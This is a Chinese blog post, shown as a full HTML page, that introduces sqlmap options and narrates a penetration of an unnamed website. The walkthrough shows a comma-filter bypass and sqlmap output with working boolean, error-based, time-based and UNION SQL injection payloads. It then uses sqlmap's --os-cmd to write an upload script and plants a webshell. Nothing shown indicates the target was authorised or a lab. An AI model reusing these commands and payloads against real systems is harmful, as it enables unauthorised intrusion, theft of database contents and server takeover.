<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入,">





  <link rel="alternate" href="/atom.xml" title="tusk1'Blog" type="application/atom+xml">






<meta name="description" content="sqlmap简介sqlmap是一个渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项，能够获取数据库中存储的数据，访问操作系统文件,执行操作系统命令等。以下是简单的参数介绍: 请求   命令 注释     - -date=DATE #通过post发送数据:     - -cookie=COOKIE #cook">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="sqlmap与一次渗透实战">
<meta property="og:url" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/index.html">
<meta property="og:site_name" content="tusk1&#39;Blog">
<meta property="og:description" content="sqlmap简介sqlmap是一个渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项，能够获取数据库中存储的数据，访问操作系统文件,执行操作系统命令等。以下是简单的参数介绍: 请求   命令 注释     - -date=DATE #通过post发送数据:     - -cookie=COOKIE #cook">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/1.png">
<meta property="og:image" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/2.png">
<meta property="og:image" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/3.png">
<meta property="og:image" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/4.png">
<meta property="og:image" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/5.png">
<meta property="og:updated_time" content="2019-03-10T15:57:04.577Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqlmap与一次渗透实战">
<meta name="twitter:description" content="sqlmap简介sqlmap是一个渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项，能够获取数据库中存储的数据，访问操作系统文件,执行操作系统命令等。以下是简单的参数介绍: 请求   命令 注释     - -date=DATE #通过post发送数据:     - -cookie=COOKIE #cook">
<meta name="twitter:image" content="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/">





  <title>sqlmap与一次渗透实战 | tusk1'Blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">tusk1'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="tusk1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tusk1'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sqlmap与一次渗透实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-10T23:22:37+08:00">
                2019-03-10
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="sqlmap简介"><a href="#sqlmap简介" class="headerlink" title="sqlmap简介"></a>sqlmap简介</h2><p>sqlmap是一个渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项，能够获取数据库中存储的数据，访问操作系统文件,执行操作系统命令等。<br>以下是简单的参数介绍:</p>
<h3 id="请求"><a href="#请求" class="headerlink" title="请求"></a>请求</h3><table>
<thead>
<tr>
<th>命令</th>
<th style="text-align:center">注释</th>
</tr>
</thead>
<tbody>
<tr>
<td>- -date=DATE</td>
<td style="text-align:center">#通过post发送数据:  </td>
</tr>
<tr>
<td>- -cookie=COOKIE</td>
<td style="text-align:center">#cookie头的值  </td>
</tr>
<tr>
<td>- -user-agent=AGENT</td>
<td style="text-align:center">#指定http user-agent头  </td>
</tr>
<tr>
<td>- -random-agent</td>
<td style="text-align:center">#使用随机user-agent头  </td>
</tr>
<tr>
<td>- -tor</td>
<td style="text-align:center">#使用匿名网络</td>
</tr>
<tr>
<td>- -proxy=IP</td>
<td style="text-align:center">#设置代理</td>
</tr>
<tr>
<td>- -timeout</td>
<td style="text-align:center">#超时等待时间</td>
</tr>
</tbody>
</table>
<h3 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h3><table>
<thead>
<tr>
<th>命令</th>
<th style="text-align:center">注释</th>
</tr>
</thead>
<tbody>
<tr>
<td>-a</td>
<td style="text-align:center">#检查一切  </td>
</tr>
<tr>
<td>- -users</td>
<td style="text-align:center">#数据库用户账户  </td>
</tr>
<tr>
<td>- -password</td>
<td style="text-align:center">#数据库账户密码  </td>
</tr>
<tr>
<td>- -is-dba</td>
<td style="text-align:center">#是否为root用户  </td>
</tr>
<tr>
<td>- -dbs</td>
<td style="text-align:center">#枚举数据库  </td>
</tr>
<tr>
<td>- -tables</td>
<td style="text-align:center">#枚举数据表  </td>
</tr>
<tr>
<td>- -columns</td>
<td style="text-align:center">#枚举字段  </td>
</tr>
<tr>
<td>- -count</td>
<td style="text-align:center">#检索表的条目数  </td>
</tr>
<tr>
<td>- -dump</td>
<td style="text-align:center">#转储数据库的表项  </td>
</tr>
<tr>
<td>- -dump-all</td>
<td style="text-align:center">#转储所有  </td>
</tr>
</tbody>
</table>
<h3 id="操作系统"><a href="#操作系统" class="headerlink" title="操作系统"></a>操作系统</h3><table>
<thead>
<tr>
<th>命令</th>
<th style="text-align:center">注释</th>
</tr>
</thead>
<tbody>
<tr>
<td>- -os-cmd=CMD</td>
<td style="text-align:center">#执行cmd命令  </td>
</tr>
<tr>
<td>- -os-shell</td>
<td style="text-align:center">#建立shell  </td>
</tr>
<tr>
<td>- -os-pwn</td>
<td style="text-align:center">#获取OOB shell,meterpreter,vnc  ,例:sqlmap -u xxx –os-pwn msf-path /usr/share/metasploit-framework/  </td>
</tr>
<tr>
<td>- -os-bof</td>
<td style="text-align:center">#存储过程缓冲区溢出  </td>
</tr>
<tr>
<td>- -priv-esc</td>
<td style="text-align:center">#数据库进程用户权限提升  </td>
</tr>
<tr>
<td>- -reg-read</td>
<td style="text-align:center">#读取注册表项  </td>
</tr>
<tr>
<td>- -reg-add</td>
<td style="text-align:center">#添加注册表项  </td>
</tr>
<tr>
<td>- -reg-del</td>
<td style="text-align:center">#删除注册表项  </td>
</tr>
</tbody>
</table>
<p>注:使用–os 命令会向目标写入一个文件上传脚本,然后通过该上传脚本上传shell、meterpreter等,并修改权限(phpversion&lt;4.1.0时).</p>
<h2 id="一次渗透"><a href="#一次渗透" class="headerlink" title="一次渗透"></a>一次渗透</h2><p>对某网站进行渗透</p>
<h3 id="前期信息搜集"><a href="#前期信息搜集" class="headerlink" title="前期信息搜集"></a>前期信息搜集</h3><p>搜索该域名及IP,未发现有用信息.<br>使用御剑对网站目录进行扫描,未发现敏感信息:<br><img src="/2019/03/10/sqlmap与一次渗透实战/1.png" alt=""><br>在网站上也未找到后台和robots.txt.  </p>
<h3 id="发现sql注入"><a href="#发现sql注入" class="headerlink" title="发现sql注入"></a>发现sql注入</h3><p>但是在一个查询页面发现了sql注入漏洞:<br><img src="/2019/03/10/sqlmap与一次渗透实战/2.png" alt=""><br>对这个点进行测试发现过滤了逗号,可以通过union select * from ((select 1)a JOIN (select 2)b JOIN (select 3)c)的方式绕过,尝试使用”into outfile”写文件却未成功,于是用sqlmap进行渗透.<br>输入命令:sqlmap.py -u “<a href="http://www.xxxx.com/cj.php?code=1&quot;" target="_blank" rel="noopener">http://www.xxxx.com/cj.php?code=1&quot;</a> ,获得以下信息:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">[15:38:05] [INFO] resuming back-end DBMS &apos;mysql&apos;</span><br><span class="line">[15:38:05] [INFO] testing connection to the target URL</span><br><span class="line">sqlmap resumed the following injection point(s) from stored session:</span><br><span class="line">---</span><br><span class="line">Parameter: code (GET)</span><br><span class="line">    Type: boolean-based blind</span><br><span class="line">    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)</span><br><span class="line">    Payload: code=1&apos; OR NOT 9500=9500#</span><br><span class="line"></span><br><span class="line">    Type: error-based</span><br><span class="line">    Title: MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</span><br><span class="line">    Payload: code=1&apos; AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171716271,(SELECT (ELT(6682=6682,1))),0x716a6a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- MBii</span><br><span class="line"></span><br><span class="line">    Type: AND/OR time-based blind</span><br><span class="line">    Title: MySQL &gt;= 5.0.12 OR time-based blind</span><br><span class="line">    Payload: code=1&apos; OR SLEEP(5)-- KVCY</span><br><span class="line"></span><br><span class="line">    Type: UNION query</span><br><span class="line">    Title: MySQL UNION query (NULL) - 13 columns</span><br><span class="line">    Payload: code=1&apos; UNION ALL SELECT NULL,NULL,CONCAT(0x7171716271,0x53415242557265476b6b777379697a4173616e47734c4c4b555a45534a6e614e476178754e634253,0x716a6a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#</span><br><span class="line">---</span><br><span class="line">[15:38:05] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web server operating system: Windows 2003 or XP</span><br><span class="line">web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.33</span><br><span class="line">back-end DBMS: MySQL &gt;= 5.5</span><br></pre></td></tr></table></figure></p>
<p>可知该sql注入漏洞可以利用,并且获得了系统信息、数据库信息等等.</p>
<h3 id="利用sql注入"><a href="#利用sql注入" class="headerlink" title="利用sql注入"></a>利用sql注入</h3><p>由于不知道网站后台,即使通过sql注入漏洞获取账号密码也不能完成任务,不过我们可以利用该漏洞在目标服务器上写一个文件上传脚本,然后上传webshell.<br>输入命令:sqlmap.py -u “<a href="http://www.xxx.com/cj.php?code=1&quot;" target="_blank" rel="noopener">http://www.xxx.com/cj.php?code=1&quot;</a> - -os-cmd=ipconfig, 然后配置参数,因为不清楚路径,所以选择Y,让sqlmap自动获取路径:<br><img src="/2019/03/10/sqlmap与一次渗透实战/3.png" alt=""><br>执行后可以看到sqlmap获取了路径,并且写入了两个脚本,其中第一个就是文件上传脚本,第二个是执行cmd命令的脚本,但是执行失败了,不过我们写入文件上传脚本的目的达成了.<br><img src="/2019/03/10/sqlmap与一次渗透实战/4.png" alt=""></p>
<h3 id="上传webshell完成渗透"><a href="#上传webshell完成渗透" class="headerlink" title="上传webshell完成渗透"></a>上传webshell完成渗透</h3><p>利用前面sqlmap写入的文件上传脚本tmpuugsd.php向目标上传大马<br><img src="/2019/03/10/sqlmap与一次渗透实战/5.png" alt=""><br>最后利用webshell成功完成渗透任务.  </p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这次渗透关键一步是利用sqlmap写入一个文件上传脚本,如果不清楚- -os 命令的原理可能不能快速完成任务,因此在平时的学习中要注意了解各类工具的原理.另外在获取webshell后才发现网站后台是admin+名称!!!说明信息搜集不够完美,思路不够开拓,今后需要注意完善.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/03/WordPress-5-0-0远程代码执行漏洞分析/" rel="next" title="WordPress 5.0.0远程代码执行漏洞分析">
                <i class="fa fa-chevron-left"></i> WordPress 5.0.0远程代码执行漏洞分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/21/ESPCMS-P8前台SQL注入与文件包含漏洞/" rel="prev" title="ESPCMS-P8前台SQL注入与文件包含漏洞">
                ESPCMS-P8前台SQL注入与文件包含漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="tusk1">
            
              <p class="site-author-name" itemprop="name">tusk1</p>
              <p class="site-description motion-element" itemprop="description">奋斗、寻觅，而不屈服</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=1592129863&website=www.oicqzone.com" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-globe"></i>QQ</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:tusk1@foxmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#sqlmap简介"><span class="nav-number">1.</span> <span class="nav-text">sqlmap简介</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#请求"><span class="nav-number">1.1.</span> <span class="nav-text">请求</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取数据"><span class="nav-number">1.2.</span> <span class="nav-text">获取数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#操作系统"><span class="nav-number">1.3.</span> <span class="nav-text">操作系统</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一次渗透"><span class="nav-number">2.</span> <span class="nav-text">一次渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前期信息搜集"><span class="nav-number">2.1.</span> <span class="nav-text">前期信息搜集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#发现sql注入"><span class="nav-number">2.2.</span> <span class="nav-text">发现sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用sql注入"><span class="nav-number">2.3.</span> <span class="nav-text">利用sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#上传webshell完成渗透"><span class="nav-number">2.4.</span> <span class="nav-text">上传webshell完成渗透</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">tusk1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
